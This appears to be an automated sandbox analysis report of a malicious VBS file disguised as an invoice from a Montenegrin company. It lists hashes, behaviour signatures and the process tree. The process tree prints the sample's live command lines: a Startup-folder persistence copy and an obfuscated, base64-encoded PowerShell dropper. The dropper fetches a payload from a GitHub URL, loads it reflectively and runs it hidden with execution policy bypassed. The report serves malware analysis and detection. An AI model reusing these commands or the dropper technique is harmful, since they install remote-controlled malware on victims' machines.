Overview

overview

10

Static

static

1

KATUNJANIN...03.vbs

windows7-x64

10

KATUNJANIN...03.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    04-10-2024 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KATUNJANIN D.O.O. Herceg Novi EUR 15613, 20241003.vbs

  • Size

    486KB

  • MD5

    bfe8bd92459f45bda7c2144a9ae3ad70

  • SHA1

    5c8a674b4dec5b7c6bfe579d5ba7c30bd426b66f

  • SHA256

    705d179b125a94e56fdcc774436bf47e3f6680b126bfdb0637657db07fa78139

  • SHA512

    fbd3c5fa3bf90cec9227912c203898870716d0cb50b0a6caade19aaf4493dce3cc4a7c1a77c713fe8963159d3195837ca1ef6dcfde8700fceed633aa7c3e7d06

  • SSDEEP

    12288:KZejbep/wU35vTs06uFBRBzPupRWdOrDt/bDqPm3hqekZEeWZCmHFLCCAYpdStSU:NX2oZLRgIZ2

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KATUNJANIN D.O.O. Herceg Novi EUR 15613, 20241003.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\KATUNJANIN D.O.O. Herceg Novi EUR 15613, 20241003.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2076
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\KATUNJANIN D.O.O. Herceg Novi EUR 15613, 20241003.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orolfitcer.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aUV4ICgoJ2wnKydjJysnWicrJ3VybCA9JysnIFU4Y2h0dHAnKydzOi8vJysncmF3LicrJ2dpdCcrJ2h1YicrJ3UnKydzZXInKydjbycrJ250JysnZW50LmNvbS8nKydOb0RldGVjdE9uL05vRGV0ZScrJ2N0TycrJ24vcmVmcy8nKydoZScrJ2FkcycrJy9tYWluL0RlJysndGEnKydoTm90JysnaC1WLnR4dCcrJ1U4YzsgJysnbGMnKydaYmFzZTY0JysnQ28nKydudGVudCA9ICcrJyhOZXctT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2wnKydpZW50KS5Eb3cnKyduJysnbG9hJysnZFN0cmknKyduZygnKydsYycrJ1p1cmwnKycpJysnOyBsJysnY1piaW5hcnlDb250ZScrJ250ID0gW1MnKyd5JysncycrJ3RlbS5DbycrJ252ZXInKyd0XTonKyc6JysnRnJvbUJhJysnc2UnKyc2JysnNFN0cmluZyhsY1onKydiYXNlNjRDb250ZW4nKyd0KScrJzsnKycgbGNaYXNzJysnZW0nKydibHkgJysnPSBbJysnUmVmbCcrJ2VjdGknKydvbi5BcycrJ3NlbWJseV06OkxvJysnYWQobCcrJ2MnKydaJysnYmluJysnYXJ5JysnQ29udGVuJysndCknKyc7JysnIFtkbmxpYi4nKydJTy5Ib20nKydlJysnXTo6JysnVkFJKFI3ODAnKycvQ28nKydoJysnblUvZC8nKydlZS5lJysndCcrJ3NhcC8nKycvOnNwdHQnKydoUicrJzc4LCBSNzhkZXMnKydhdCcrJ2knKyd2YWRvUjc4LCcrJyBSNycrJzgnKydkZXNhdGknKyd2JysnYWQnKydvUjc4LCAnKydSNzhkZXNhJysndCcrJ2knKyd2YWRvUjc4JysnLCBSNycrJzhBZGRJblAnKydyb2Nlc3MzMlInKyc3OCwgUjc4UicrJzc4LFI3OFI3OCcrJyknKS5yRXBsYWNFKCdsY1onLFtzdHJJTkddW0NIQXJdMzYpLnJFcGxhY0UoKFtDSEFyXTg1K1tDSEFyXTU2K1tDSEFyXTk5KSxbc3RySU5HXVtDSEFyXTM5KS5yRXBsYWNFKChbQ0hBcl04MitbQ0hBcl01NStbQ0hBcl01NiksW3N0cklOR11bQ0hBcl0zNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iEx (('l'+'c'+'Z'+'url ='+' U8chttp'+'s://'+'raw.'+'git'+'hub'+'u'+'ser'+'co'+'nt'+'ent.com/'+'NoDetectOn/NoDete'+'ctO'+'n/refs/'+'he'+'ads'+'/main/De'+'ta'+'hNot'+'h-V.txt'+'U8c; '+'lc'+'Zbase64'+'Co'+'ntent = '+'(New-Object S'+'ystem.Net.WebCl'+'ient).Dow'+'n'+'loa'+'dStri'+'ng('+'lc'+'Zurl'+')'+'; l'+'cZbinaryConte'+'nt = [S'+'y'+'s'+'tem.Co'+'nver'+'t]:'+':'+'FromBa'+'se'+'6'+'4String(lcZ'+'base64Conten'+'t)'+';'+' lcZass'+'em'+'bly '+'= ['+'Refl'+'ecti'+'on.As'+'sembly]::Lo'+'ad(l'+'c'+'Z'+'bin'+'ary'+'Conten'+'t)'+';'+' [dnlib.'+'IO.Hom'+'e'+']::'+'VAI(R780'+'/Co'+'h'+'nU/d/'+'ee.e'+'t'+'sap/'+'/:sptt'+'hR'+'78, R78des'+'at'+'i'+'vadoR78,'+' R7'+'8'+'desati'+'v'+'ad'+'oR78, '+'R78desa'+'t'+'i'+'vadoR78'+', R7'+'8AddInP'+'rocess32R'+'78, R78R'+'78,R78R78'+')').rEplacE('lcZ',[strING][CHAr]36).rEplacE(([CHAr]85+[CHAr]56+[CHAr]99),[strING][CHAr]39).rEplacE(([CHAr]82+[CHAr]55+[CHAr]56),[strING][CHAr]34) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    bd470729fc5384fe8493472ecfda1750

    SHA1

    4ec8f4bb5973cc29883bbd0dc4f64190ee76def9

    SHA256

    81af9a8267acc65f29b14caafe284f7986744a236176b6d2dbb14541038dcd8e

    SHA512

    aa41d8fa1696860a955902905c3c8799accdd40ea61a89bb47cc7fa1ddc94dfa0849833dc4a9df0423ff2905cf156e82469053829a213e133539dd9193a5fc15

    Download Submit

  • memory/2600-18-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2600-19-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2692-5-0x000007FEF5C6E000-0x000007FEF5C6F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2692-6-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2692-7-0x0000000002760000-0x0000000002768000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2692-8-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-9-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-10-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-11-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-12-0x000007FEF59B0000-0x000007FEF634D000-memory.dmp

    Filesize

    9.6MB

    Download